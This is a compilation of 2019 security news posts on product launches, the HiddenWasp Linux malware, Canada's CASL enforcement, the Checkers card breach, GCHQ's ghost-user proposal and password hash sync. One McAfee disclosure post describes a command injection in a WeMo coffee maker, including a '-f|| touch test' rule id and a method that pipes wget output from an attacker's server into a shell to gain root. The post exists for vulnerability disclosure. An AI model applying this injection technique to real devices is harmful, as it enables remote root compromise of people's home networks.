SailPoint Predictive Identity platform: The future of identity governance SailPoint unveiled the SailPoint Predictive Identity platform, the intelligent cloud identity platform of the future that accelerates the industry to the next generation of identity governance. The solution automates identity processes using AI-driven recommendations while finding new areas of access and bringing them under governance with auto-discovery. Zyxel SD-WAN gets security, usability and speed boost Zyxel SD-WAN provides a reliable and secure WAN through an annual … More

The post New infosec products of the week: May 31, 2019 appeared first on Help Net Security.

What mechanisms can help address today’s biggest cybersecurity challenges?

In this Help Net Security podcast, Syed Abdur Rahman, Director of Products with unified risk management provider Brinqa, talks about their risk centric knowledge-driven approach to cybersecurity problems like vulnerability management, application security and cloud and container security. Here’s a transcript of the podcast for your convenience. Hi, my name is Syed Abdur and I’m the Director of Products at Brinqa, where I’m responsible for product management and technical product marketing. Brinqa is a cyber … More

The post What mechanisms can help address today’s biggest cybersecurity challenges? appeared first on Help Net Security.

Two-Step Verification

Two-step verification is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and code sent to or generated by your mobile device. Examples of services that support two-step verification include Gmail, Dropbox and Twitter.

Researchers spot manipulated photos and video using AI-driven imaging system

To thwart sophisticated methods of altering photos and video, researchers at the NYU Tandon School of Engineering have demonstrated an experimental technique to authenticate images throughout the entire pipeline, from acquisition to delivery, using artificial intelligence (AI). In tests, this prototype imaging pipeline increased the chances of detecting manipulation from approximately 45 percent to over 90 percent without sacrificing image quality. Determining whether a photo or video is authentic is becoming increasingly problematic. Sophisticated techniques … More

The post Researchers spot manipulated photos and video using AI-driven imaging system appeared first on Help Net Security.

Is This The Start Of Open Source Malware for Linux?

Linux is considered a more secure and privacy-focused operating system than Windows, not only because of a low market share (only 2% of all installed desktop operating system) but also due to its very architecture that is patterned after Unix. However, a device cannot approach absolute security while also connected to the Internet, that in itself is a contradiction of terms, this is regardless of the operating system used. Intezer Labs, represented by its security researchers, Ignacio Sanmillan has revealed that a malware named as HiddenWasp specifically designed to target Linux machines, infecting its victims with a rootkit-like process. Chinese hacker group used a malware named Winnti to perform the same attack against Linux previously, which made Sanmillan accuse HiddenWasp as a creation of the same group.

“We found some of the environment variables used in an open-source rootkit known as Azazel. In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from [the] Elknot [malware] that could have been shared in Chinese hacking forums,” explained Sanmillan.

Intezer Labs researchers investigated the Adore-ng rootkit, it is an open source software which a certain portion of the code was used for Mirai malware previously. A small portion of the rootkit properties is similar to Azazel rootkit. HiddenWasp contains a rootkit component that closely resembles Adore-ng. “We observed that [the HiddenWasp] files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong,” added Sanmillan.

As of this writing, Sanmillan’s team is still not aware of what the Chinese group is behind the development of the malware. It takes a lot of effort to infect a Linux system, as the user requires typing the root password in order to install software deep into the system. Since the user has no root access by default in a Linux system, all HiddenWasp can do is install its rootkit component as a user-level process. The team continues to investigate the malware, as the component of the second payload is not yet known, but most probably it has something to do with the RAT-module for HiddenWasp.

“Unfortunately, I don’t know what is the initial infection vector. Based on our research, it seems most likely that this malware was used in compromised systems already controlled by the attacker. From our research, it looks like an implant from a targeted attack. It’s hard to say if it’s used by [a] nation-sponsored attacker or someone else, but it is definitely not the usual DDOS/mining malware for quick profits,” concluded Sanmillan.

Intezer has published a comprehensive article in their official blog detailing the minute-to-minute operations of HiddenWasp the moment it arrives in a vulnerable Linux installation. The open source nature of Linux being matched by a somewhat “open source” malware in HiddenWasm may start a new trend of having an open source version of malware targeting Linux hosts.

Also, Read:

5 Ways to Safeguard yourself from Linux Malware

What is Linux Malware? Here’s what you need to know about it

The Best 10 Linux Distro for Penetration Testing

Trickbot, Fast Becoming the Malware Of The Year?

Nasty Side-Channel Attack Vulnerability (Again) In Windows & Linux Discovered

The post Is This The Start Of Open Source Malware for Linux? appeared first on .

Dolos DNS Rebiner: What You Need to Know

Although DNS rebinding attacks have been known for over a decade now, they are only recently receiving attention as a practical attack surface. In the last year, quite a few popular products have been shown to lack DNS rebinding protections, and as a result, someone could operate them remotely using a malicious web site. Manufacturers […]… Read More

The post Dolos DNS Rebiner: What You Need to Know appeared first on The State of Security.

StorageCraft ShadowXafe protects all data for midsize companies and MSPs irrespective of its source

StorageCraft, whose mission is to protect all data and ensure its constant availability, announced a powerful upgrade and expansion of its flagship product, StorageCraft ShadowXafe. The solution now provides enhanced features for Managed Service Providers (MSPs), including data monitoring, protection, and recovery for the entire data center, independent of size and type of machine, from a single console. It eliminates complexity, improves productivity, and reduces pressure on IT skills and training. ShadowXafe outperforms competitive offerings … More

The post StorageCraft ShadowXafe protects all data for midsize companies and MSPs irrespective of its source appeared first on Help Net Security.

Cymulate launches new Advanced Persistent Threat simulation

Cymulate, the most comprehensive, on-demand SaaS-based Breach and Attack Simulation (BAS) platform, launched its new Advanced Persistent Threat (APT) simulation. The new simulation vector enables companies to simulate a full-scale APT attack on their network with a click of a button, challenging security control mechanisms through the entire cyber kill chain, from pre-exploitation (Reconnaissance, Weaponization and Delivery) into exploitation, and even post-exploitation activities such as Command and Control (C&C) communication and data exfiltration. The APT … More

The post Cymulate launches new Advanced Persistent Threat simulation appeared first on Help Net Security.

HiveIO delivers data center intelligence with Hive Fabric 7.3

HiveIO, a company that transforms commodity data center equipment into an intelligent virtualization platform, released version 7.3 of Hive Fabric, an Artificial Intelligence-ready fabric solution that enables organizations to deploy virtualization technology without the need for vendor complexity or specialists. The latest software release provides Hive Fabric users with increased operational capabilities to further reduce the time needed to support a virtualization environment while also maximizing the performance, capacity, and spend on existing infrastructure. “Hive … More

The post HiveIO delivers data center intelligence with Hive Fabric 7.3 appeared first on Help Net Security.

Ricoh searches terabytes of global IT logs in real time with Elasticsearch

Ricoh is operationalizing the Elastic Stack to visualize and monitor two terabytes of logging data a day to watch for and react quickly to security threats across its global IT infrastructure. Prior to implementing the Elastic Stack, Ricoh’s infrastructure surveillance system wasn’t able to instantly link and detect anomalous events from the Internet all the way through to the endpoint. This was exposed during the WannaCry ransomware attack, which prompted Ricoh to issue several security … More

The post Ricoh searches terabytes of global IT logs in real time with Elasticsearch appeared first on Help Net Security.

New Context LS/IQ Lite: Measure your security and compliance posture

New Context, a in cybersecurity for highly regulated industries, launched LS/IQ Lite, a complementary subset of LS/IQ. It is designed to help enterprises see the potential of LS/IQ, a solution to implement Secure DevOps and deliver Secure Compliant Data Platforms. “Our LS/IQ early adopters are already seeing significant value in using the platform,” said Andrew Storms, VP of Product at New Context. “I am thrilled to offer a complimentary LS/IQ Lite score to help organizations … More

The post New Context LS/IQ Lite: Measure your security and compliance posture appeared first on Help Net Security.

DataVisor expands EMEA operations after seeing more demand in the region

DataVisor, the company delivering comprehensive AI-powered fraud management solutions across industries, today announced expanded operations in EMEA to address the growing need for its solutions. The company has emerged as a leader in fraud management solutions globally and is seeing more demand in the region. DataVisor already has great traction in the area – several household names in leading marketplaces and in gaming use DataVisor to detect and prevent fraud. Now, the company has its … More

The post DataVisor expands EMEA operations after seeing more demand in the region appeared first on Help Net Security.

Capsule8 names Scott Kenerly as CFO

Capsule8, the only company providing high-performance attack protection for Linux production environments, today announced the appointment of Scott Kenerly as Chief Financial Officer (CFO). The news comes on the heels of Capsule8 bolstering its leadership team to address rapid growth by naming Jim Bandanza as Chief Operating Officer/CRO and Kelly Shortridge as Vice President of Product Strategy. Scott brings 20 years of finance and accounting expertise to his role at Capsule8. He joins from Argyle … More

The post Capsule8 names Scott Kenerly as CFO appeared first on Help Net Security.

Canada Uses Civil Anti-Spam Law in Bid to Fine Malware Purveyors

Canadian government regulators are using the country’s powerful new anti-spam law to pursue hefty fines of up to a million dollars against Canadian citizens suspected of helping to spread malicious software.

In March 2019, the Canadian Radio-television and Telecommunications Commission (CRTC) — Canada’s equivalent of the U.S. Federal Communications Commission (FCC), executed a search warrant in tandem with the Royal Canadian Mounted Police (RCMP) at the home of a Toronto software developer behind the Orcus RAT, a product that’s been marketed on underground forums and used in countless malware attacks since its creation in 2015.

The CRTC was flexing relatively new administrative muscles gained from the passage of Canada’s Anti-Spam Legislation (CASL), which covers far more than just junk email. Section 7 of CASL deals with the alteration of transmission data, including botnet activity. Section 8 involves the surreptitious installation of computer programs on computers or networks including malware and spyware.

And Section 9 prohibits an individual or organization from aiding, inducing, procuring or causing to be procured the doing of any of the above acts.

CRTC Director Neil Barratt said this allows his agency to target intermediaries who, through their actions or through inaction, facilitate the commission of CASL violations. Businesses found to be in violation of CASL can be fined up to $10 million; individuals can face up to a $1 million fine.

“We’re dealing with a lower burden of proof than a criminal conviction, and CASL gives us a little more leeway to get bad actors off our networks in Canada and to ultimately improve security for people here and hopefully elsewhere,” Barratt said in an interview with KrebsOnSecurity.

“CASL defines spam as commercial electronic messages without consent or the installation of software without consent or the intercepting of electronic messages,” Barratt said. “The installation of software is under Section 8, and this is one of the first major investigations under that statute.”

Barratt added that the CRTC also was counting on CASL to help tidy up the reputation of the Canadian Web hosting industry.

“We’ve been trying to make sure that service providers operating in Canada — whether or not they are Canadian — are not unduly contributing to the infection of machines and hosting malware,” Barratt said. “We have great power in CASL and Section 9 makes it a violation to aid in the doing of a violation. And this extends quite broadly, across email service providers and various intermediaries.”

The enforcement division of the CRTC recently took action against two companies — Datablocks Inc. and Sunlight Media Network Inc — for having violated CASL section 9 by disseminating online ads that caused malicious computer programs to be downloaded onto the computers of unsuspecting victims.

Under CASL, and for the purposes of verifying compliance or determining whether any of sections 6 to 9 were violated, the CRTC may compel individuals and organizations to provide any information in their possession or control, and ask a justice of the peace to issue a warrant authorizing entry into a place of residence.

It’s good to see a civil anti-spam law being used to go after people involved in selling malware couched as legitimate software, as seems to be the case with the Orcus RAT investigation. A relatively competent remote access trojan author can earn a tidy income selling their wares, but CASL may give Canadians interested in this line of a work a reason to reconsider if the end result is a million dollar fine.

More to the point, Canada (anecdotally at least) seems to have far more than its fair share of computer criminals, and yet unfortunately far less appetite than many other western countries for prosecuting those individuals criminally. In this regard, CASL offers a welcome alternative.

“One of the key takeaways of CASL was that it wasn’t just about emails that were annoying people, but also the use of email as a vector to mislead or defraud people and cause harm to computers and computer networks,” Barratt said. “Our parliamentarians decided to ensure the legislature covered a broad ambit. The search warrant executed in this case was a great example of criminal and civil law enforcement working together by using our unique tools and powers under the act to achieve the greatest good we could.”

Gmail’s Confidential Mode for All G Suite Users from June 25

Gmail’s confidential mode would be available for all G Suite users from June 25.

Google had launched Gmail’s confidential mode in beta earlier in August 2018. Now, Google has announced its plans to launch the confidential mode for all G Suite users. This will happen on June 25.

Google has clarified that once the Gmail confidential mode becomes generally available for all G Suite users, it would be set to default ON for all domains with Gmail enabled, unless the user chooses to disable the feature.

Gmail Confidential Mode: What’s it?

The Gmail confidential mode makes it possible for the sender of an email to revoke a sent email or even add expiration dates to it. It will also be possible to block printing and forwarding of emails.

A blog post from the G Suite team explains it in detail; it says- “Confidential mode provides built-in information rights management controls in your emails by allowing senders to create expiration dates and revoke previously sent messages. Because a sender can require additional authentication via text message to view an email, it’s also possible to protect data even if a recipient’s email account has been hijacked while the message is active. Additionally, with confidential mode, recipients don’t have the option to forward, copy, print, or download their content or attachments.”

Thus, the sender of an email in confidential mode can configure various options including setting a date for expiration or self-destruction (as regards setting expiration, it can be configured from 1 day to 5 years), demanding password entry for the mail to open etc.

The confidential mode works with all email providers because these emails wouldn’t be containing the actual email. The recipient would be getting an email that contains a link to the Google servers that hosts the email. When the recipient clicks on the link, Google would demand a login to confirm that it’s the intended recipient. Once the recipient logs in, the email would be made available. In case the sender realizes that the email was sent by mistake or if the sender wishes to withdraw access, opening the email and clicking on the Remove access button in the Sent folder would do the job.

While using the confidential mode, since the sender can require additional authentication (via text message) from the recipient to view an email, it becomes possible to protect data even if the recipient’s email account is hacked when the message is active.

When the Gmail confidential mode was launched in beta in August 2018, experts pointed out that though recipients cannot save or print the mail as such, it’s not possible to stop the recipient from taking a screenshot. Similarly, experts also pointed out that this feature could be used in future for launching phishing attacks, especially since there is a link that necessitates login from the part of the recipient.

How to use Gmail confidential mode

Users can at present go to Apps> G Suite > Settings for Gmail > User settings and choose either the “Disable” or the “Enable now (beta)” option. Once the feature is launched for general use, users can choose the “Enable when the feature is in general availability” option. Google provides users with details instructions about protecting emails using the confidential mode and also regarding how to send and read confidential messages, how to work with Gmail confidential mode messages in vault etc.

So now, it’s going to be a wait till June 25, when the Gmail confidential mode will be made available on all G Suite editions, with one to three days for feature visibility on both the rapid and scheduled release domains.

Related Resources:

Google Helps Identify Crime Suspects Using Location History

Google Still Going Strong Even After 3rd Antitrust Fine

Google Photos Vulnerability that Lets Retrieve Image Metadata


The post Gmail’s Confidential Mode for All G Suite Users from June 25 appeared first on .

What’s Your Defense Strategy? Best Practices for Red Teams, Blue Teams, Purple Teams

Want to determine the safety of a car? Perform a crash test. One of the most common ways to test the strength of something, particularly when it comes to technology, is by putting it through a stress test. Naturally, this same principle is a critical component of cybersecurity. One of the most effective ways to try and find your security infrastructure’s weaknesses, and your security team’s ability to detect and respond to attacks, is through red team/blue team tests. Read on the find out the differences between these teams, the emergence of purple teams, and the most effective ways to utilize them.

Red team and blue team tests are named and modeled after military exercises. In order to ensure soldiers are battle ready, simulations are run to test out the effectiveness of their defense strategies. In these simulations, red teams take on the offensive role of the enemy, while the blue team is on the defensive, shielding their position. In the cybersecurity realm, the roles are the same, but the battlefield is in the digital sphere.


What is a Red Team?

Red teams are designed to think like attackers, and are brought on specifically to put the organization’s cybersecurity posture to the test, utilizing multiple strategies in order to breach defenses. Some of these approaches include vulnerability assessments, penetration tests, or even social engineering attacks like phishing. Red teams use a variety of tools, such as pen testing solutions like Core Impact, to create the most effective simulation they can.

Though key parties may be informed that a red team campaign is taking place, most employees, including the organization’s IT team, won’t be notified until after the fact, making it as authentic as possible.

Red teams can be internal, which helps set up long term goals and ensures frequent testing. Oftentimes, however, they are hired from an external firm. Having an outside team, like Security Consulting Services, come in can also be ideal since they provide a fresh pair of expert eyes, often seeing vulnerabilities that internal security personnel may miss, simply because internal teams have such frequent exposure to the environment they’re testing.

What is a Blue Team?

Blue teams are in charge of building up an organization’s protective measures, and taking action when needed. This is done in a variety of ways. Regular system hardening procedures include updates, patching, eliminating unused software or features, or changing passwords. Additionally, new security tools can be deployed, like SIEM solutions that help blue teams monitor data logs from different assets for security alerts.

What is a Purple Team?

More recently, the idea of a purple team has become the latest buzzword in the cybersecurity world. While there is some confusion surrounding the usage and definition of the term, it’s best to focus on the ideal it is promoting. Ultimately, the concept of a purple team is the mindset of seeing and treating red and blue teams as symbiotic.  It’s not red teams vs. blue teams, but rather one large team focusing on the one overarching goal: improving security. The key to becoming a purple team comes down to communication.

One of the purposes of a red team is to act as a training function for the blue team. Infiltrating and testing the environment is only part of the job. Measuring and improving the ability to detect and respond to attacks is a key part of living up to the ideal of being a purple team. Red teams must prioritize documentation and education efforts so that blue teams can take appropriate action towards remediation and build up resiliency.

Blue teams, in turn, should view the findings of a red team as a guide for where to focus their efforts, and as a roadmap to find vulnerabilities before the next exercise. In a perfect scenario, red teams wouldn’t find the same vulnerability twice.

Best Practices, No Matter the Color

Operating like a purple team is simply adhering to best practices in order to create an environment that is a stronghold against cyber-attacks. As mentioned above, communication between teams is the most critical element in this, but here are a few other ways to get the most out your red team and blue team exercises:

Have a plan of action.

The planning stages of simulation exercises are just as important as the exercises themselves. There are endless scenarios and methodologies to use when attempting to exploit a system, so it’s vital to limit your scope. Red teams should have set objectives and measurable goals that will provide helpful data for blue teams to analyze. Blue teams should use this data to create their own objectives and goals for remediation.

Always follow up.

While it’s tempting to simply move on to the next task, it’s critical to follow up after every exercise. Retrospectives are a great way for teams to learn from one another and can shed further light on patching and preventing weaknesses. Additionally, fixes themselves must also be verified, so following up with retesting efforts is crucial.

Think outside the box.

Threat actors aren’t following a set of rules when they break into a system. Red teamers can stay within the scope of the exercise while still having the freedom to be equally creative. However, remember to show your work – blue teams can only prevent an attack if they can understand how it was done.

Never stop learning.

Promote a culture of learning and encourage both red and blue teams to stay up to date on the latest tools and tricks to prevent being caught off guard. Hackers are always evolving, and true purple teams evolve right along with them.


Penetration testing
Big text: 
Resource type: 
Get the Most Out of Your Red Team

Equip your red team with a comprehensive pen testing solution that can safely exploit vulnerabilities. Get a live demo of Core Impact today.

Insight Venture Partners to Acquire Recorded Future

Insight Venture Partners to Acquire Recorded Future

Insight Venture Partners has agreed to acquire a controlling interest in Recorded Future, a threat intelligence company, in addition to the minority stake it already owns. The all-cash transaction puts the value of Recorded Future at more than $780 million. 

According to its press release, Recorded Future is the largest privately held threat intelligence software company in the world, with more than 400 clients. Its solution is powered by its patented machine learning, alerting companies to unknown threats before they affect the business, helping teams respond to alerts 10 times faster. The solution pulls information from technical, open web and dark web sources and aggregates it with customer data. 

Insight Venture Partners is a leading global capital and private equity firm investing in high-growth technology and software companies. Founded in 1995, it has over $20 billion of assets under management and has cumulatively invested in over 300 companies worldwide.

According to Recorded Future's co-founder and CEO, Christopher Ahlberg, the investment will help the company "tap into the full potential of its technical roadmap" and solve some of "the most difficult and unique intelligence challenges" today.  

“My leadership team and I have had the privilege to work with Mike Triplett and the Insight team for a number of years, benefiting from their sage advice, industry knowledge and relationships," he commented. "This transaction is the logical next step for Recorded Future given the opportunities in front of us, as we fully realize the potential and vision of our strategy.”

Triplett, managing director at Insight, said: “Insight’s renewed investment is a testament to the vision and direction laid out by Recorded Future’s leadership team. They envision a world where everyone applies intelligence at speed and scale to reduce risk, remaining hyper-focused on providing clients with the threat intelligence necessary to understand their environments, manage risk, and combat malicious actors through contemporary awareness gained from the implementation of a threat intelligence-led security strategy." 

Pursuant to the terms of this investment, Triplett and Thomas Krane, VP at Insight, will join Recorded Future’s board of directors.

Recorded Future customers have included Bank of America, Nasdaq, Abbott and T-Mobile. 

Checkers double drive-thru restaurants chain discloses card breach

Checkers and Rally’s, one of the largest chains of double drive-thru restaurants in the United States, disclosed a credit card breach.

“We recently became aware of a data security issue involving malware at certain Checkers and Rally’s locations.” reads a breach notice published by the company. “After discovering the issue, we quickly engaged leading data security experts to conduct an extensive investigation and coordinated with affected restaurants and federal law enforcement authorities to address the matter.”

According to the security notice, crooks breached the systems of the company and planted a PoS malware in its payments processing system allowing an unauthorized party to siphon payment card data of some guests. The malware only infected the point-of-sale systems at some Checkers and Rally’s locations.

“The malware was designed to collect information stored on the magnetic stripe of payment cards, including cardholder name, payment card number, card verification code and expiration date.” continues the notice. “Based on the investigation, we have no evidence that other cardholder personal information was affected by this issue.”

The company provided a list of the affected locations and the estimated windows of exposure during which the PoS malware was used to steal the guests’ card data.

102 restaurants have been impacted, roughly 15% of all of the locations.

Most of the impacted locations have been infected with the PoS malware between early 2018 and 2019, the list also includes some locations compromised back in 2017, and one infection dates back September 2016.

Checkers declared that the malicious code was completely removed from the payment systems in April 2019.

The company reported the card breach to the authorities and hired third-party security experts to contain and remove the malware

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders,” reads the notice Checkers. “We encourage you to review your account statements and contact your financial institution or card issuer immediately if you identify an unauthorized charge on your card. The payment card brands’ policies provide that cardholders have zero liability for unauthorized charges that are reported in a timely manner.”

The company encourages potentially affected guests to review their account statements and contact their financial institution or card issuer immediately if they identify an unauthorized charge on card.

Clients are entitled under U.S. law to one free credit report annually from each of the three nationwide consumer reporting agencies. 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Checkers, card breach)

The post Checkers double drive-thru restaurants chain discloses card breach appeared first on Security Affairs.

Companies and Experts Call on GCHQ to Abandon “Ghost User” Proposal

Companies and Experts Call on GCHQ to Abandon "Ghost User" Proposal

Technology companies, trade associations, civil society organizations and 17 individual experts in digital security and policy have signed an open letter to the UK's Government Communications Headquarters (GCHQ), outlining concerns regarding a proposal by the intelligence center on allowing access to encrypted devices. The letter was shared with GCHQ on May 22, 2019, and made public on May 29, 2019.

GCHQ set forth its proposal for “silently adding a law enforcement participant to a group chat or call” in an Lawfare article in November 2018. This would "add a ghost user into encrypted chats" that would "require providers to suppress normal notifications to users." According to the letter, this would make users "unaware that a law enforcement participant had been added and could see the plain text of the encrypted conversation."

Written by Sharon Bradford Franklin and Andi Wilson Thompson, the letter to GCHQ explains how the ghost proposal would work, the ways in which technology companies would need to change their systems and the dangers that it would present. Specifically, the consortium outlined that if implemented, such access would “undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused.” 

Jake Moore, security specialist at ESET, told Infosecurity that the proposal by GCHQ "makes a mockery of the fundamental basics of encryption."

"Not only is it going against what privacy is all about, but if you create a back door for the good guys, the bad guys won’t be far behind. Encryption is there for multiple reasons and shouldn’t be messed with. GCHQ has always had an issue with breaking serious encryption but to now demand access to private chats has far-reaching implications. 

"Cyber-criminals are not just using WhatsApp and, if a law one day passes to read this application, it will just push them to use another app – if they aren’t already. There are many apps which already promise ultimate privacy and are heavily used and relied upon.”

The open letter from the group asks GCHQ "to abandon the ghost proposal and any other approach that would pose similar risks to digital security and human rights." They also request an open dialogue with the intelligence organizations to address law enforcement access to encrypted chats and messages. 

This news comes after Germany proposed giving access to security authorities to apps such as WhatsApp and Telegram. 

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches

Organizations are not equipping themselves against privileged access management (PAM) abuse, according to a report by Centrify and Techvangelism. Nearly 80% of organizations were found not to have a mature approach to combating PAM cyber-attacks, yet 93% of the organizations surveyed believe they were somewhat prepared for threats that involve privileged credentials. 

“This survey indicates that there is still a long way to go for most organizations to protect their critical infrastructure and data with mature privileged access management approaches based on zero trust,” says Tim Steinkopf, CEO of Centrify. “We know that 74% of data breaches involve privileged access abuse, so the overconfidence these organizations exhibit in their ability to stop them from happening is concerning."

The report found that companies do not take "the simplest" of measures, with 52% stating they do not use a password vault. In fact, out of the 1,300 organizations across 11 industry verticals in the U.S. and Canada, 43% were identified as having a "nonexistent" PAM approach. 

The survey also revealed that over half of companies surveyed have some questionable privileged access control; for example, 52% use shared accounts for controlling privileged access; 58% of organizations do not use multifactor authentication (MFA) for privileged administrative access to servers, and 51% of organizations do not control access to transformational technologies with privileged access, including modern attack surfaces, such as cloud workloads, big data projects and containers.

Looking at industry-specific trends, 39% of technology organizations have a nonexistent approach to PAM, as do healthcare (45%) and government (42%), which are both highly regulated and handle sensitive data. The financial sector scored highest in the "mature" category, followed by energy and utilities (26%). 

Cathy Hall, PAM practice lead at Sila Solutions Group, wrote about the best practice for PAM for Infosecurity Magazine in April 2019: "The best way to handle ... PAM ... isn’t to simply check a box to satisfy a mandate, it’s to view it as a mission. A mission-based approach ensures that you improve security across your whole enterprise over time, rather than only satisfying a limited, one-time mandate." 

Android Q: Cheat sheet

Android Q's features will transform some phones into more user-friendly, customizable, and secure environments. Here's what developers, businesses, and users need to know about Google's Android 10.0.

Mr. Coffee with WeMo: Double Roast

McAfee Advanced Threat Research recently released a blog detailing a vulnerability in the Mr. Coffee Coffee Maker with WeMo. Please refer to the earlier blog to catch up with the processes and techniques I used to investigate and ultimately compromise this smart coffee maker. While researching the device, there was always one attack vector that I had wanted to revisit. It was during the writing of that blog that I was finally able to circle back to it. As it turns out, my intuition was accurate; the second vulnerability I found was much simpler and still allowed me to gain root access to the target.

Recapping the original vulnerability

The first vulnerability modified the “template” section of the brew schedule rule file, which a is unique file that is sent when the user schedules a brew in advance. I also needed to modify the template itself, sent from the WeMo App directly to the coffee maker. During that research I noticed that many of the other fields could be impactful but did not investigate them as thoroughly as the template field.

Figure 1: Brew schedule rule

When the user schedules a brew, an individual rule is added to the Mr. Coffee root crontab. The crontab entry uses the rule’s “id” field to make sure the correct rule is executed at the desired time.

Figure 2: Root crontab entry

Crontab allows for basic scheduling features from the OS level. The user provides both the command to execute as well as timing details down to the minute, as shown in Figure 3.

Figure 3: Crontab syntax

During the initial research, I started to fuzz the rule id field; however, because every rule name that I placed in the malicious schedule was always prepended by the “/sbin/rtng_run_rule”, I could not get anything abnormal to happen. I also noticed that a lot of characters that could be useful for command injection were being filtered.

The following is a list of characters sanitized or filtered on input.

At this point I moved on and ended up finding the template vulnerability as laid out in the previous blog.

Finding an even more simple vulnerability

A few months after disclosing to Belkin, I revisited the steps to achieve this template abuse feature, in preparation for a public disclosure blog. Having the ability to write arbitrary code directly into the root’s crontab is enticing, so I began looking into it again. I needed to find a way to terminate the “rtng_run_rule” and add my own commands to the crontab file by modifying the “id” field. The “rtng_run_rule” file is a shell script that directly calls a Lua script named “rtng_run_rule.lua”. I noticed that I could send the double pipe “||” character but the “rtng_run_rule” wrapper script would never return a failing return code. Next, I looked at the how the wrapper script is handling command line arguments as shown below.

Figure 4: rtng_run_rule wrapper script

At this point I created a new rule: “-f|| touch test”. The “-f” is not a parsed argument, meaning it will take the “Bad option” case, causing the “rtng_run_rule” wrapper script to return “-1”. With the wrapper script returning a failing return code, the “||” (or) statement is initiated, which executes “touch test” and creates an empty file named “test”. Since I still had serial access (I explain in detail in my previous blog how I achieved this) I was able to log in to the coffee maker and find where the “test” file was located. I found it in root’s home directory.

Being able to write arbitrary files and execute commands without the “/” character is still somewhat limiting, as most file paths and web URLs will need forward slashes. I needed to find a way to execute commands that had “/” characters in them. I decided to do this by downloading a file from a webserver I control and executing it in Ash to bypass file path sanitization characters.

Figure 5: Commands allowing for execution of filtered characters.

Let me break this down. The “-f” as indicated before will cause the wrapper script to execute the “||” command. Then the “wget” command will initiate a download from my web server, located at IP address “” The “-q” will force wget to only print what it receives, and the “-O -“ tells wget to print to STDOUT instead of a file. Finally, the “| ash” command grabs all the output from STDOUT and executes it as Linux shell commands.

This way I can set up a server that simply returns a file containing necessary Linux commands and host it on my local machine. When I send the rule with the above command injection it will reach out to my local server and execute everything as root. The technique of piping wget into Ash also bypasses all the character filtering so I can now execute any command I want.

Status with Vendor

Belkin did patch the original template vulnerability and released new firmware. The vulnerability explained in this blog was found on the new firmware and, as of today, we have not heard of any plans for a patch. This vulnerability was disclosed to Belkin on February 25th, 2019. In accordance with our vulnerability disclosure policy, we are releasing details of this flaw today in hopes of alerting consumers of the device of the ongoing security findings. While this bug is also within the Mr. Coffee with WeMo’s scheduling function, it is much easier for an attacker to leverage since it does not require any modifications to templates or rehashing of code changes.The following demo video shows how this vulnerability can be used to compromise other devices on the network, including a fully patched Windows 10 PC.

Key takeways for enterprises, consumers and vendors

Devices such as the Mr. Coffee Coffee Maker with WeMo serve as a good reminder of the pros and cons to “smart” IoT. While advances in automation and technology offer exciting new capabilities, they should be weighed against the potential security concerns. In a home setting, consumers should set up these types of devices on a segmented network, isolated from sensitive network traffic and more critical devices. They should implement a strong password policy to make network access more challenging and apply patches or updates for all networked devices whenever available. Enterprises should restrict access to devices such as these in corporate environments or, at a minimum, provide a policy for oversight and management. They should be treated just the same as any other asset on the network, as IoT devices are often unmonitored pivot points into more critical network infrastructure. Network scanning and vulnerability assessments should be performed, in conjunction with a rigorous patching cycle for known issues. While the vendor has not provided a CVE for this vulnerability, we calculated a CVSS score of 9.1 out of 10. This score would categorize this as a critical vulnerability.Finally, as consumers of these products, we need to ask more of the vendors and manufacturers. A better understanding of secure coding and vulnerability assessment is critical, before products go to market. Vendors who implement a vulnerability reporting program and respond quickly can gain consumers’ trust and ensure product reputation is undamaged. One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post Mr. Coffee with WeMo: Double Roast appeared first on McAfee Blogs.

AI, the Mandatory Element of 5G Mobile Security

The complexity and scale of the 5G ecosystem, combined with a lack of skills and training in software-centric security, will be important drivers for AI deployment in the carrier space.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. Rather, it syncs the hashes of passwords, which have all undergone a per-user salt and 1,000 iterations of the HMAC-SHA256 key hashing algorithm, before being sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that the SHA256 hash cannot be decrypted—so the plain-text version of the password is never and can never be exposed to Microsoft.

The second important consideration of PHS is that, with PHS your Identity Management provider is moved from your current provider to Azure AD. This allows the organization to move from an Identity Management provider—which is typically an on-premises server and requires maintenance and potentially server downtime—to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter. For more information Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real-time, while allowing the real user to continue to successfully sign in.
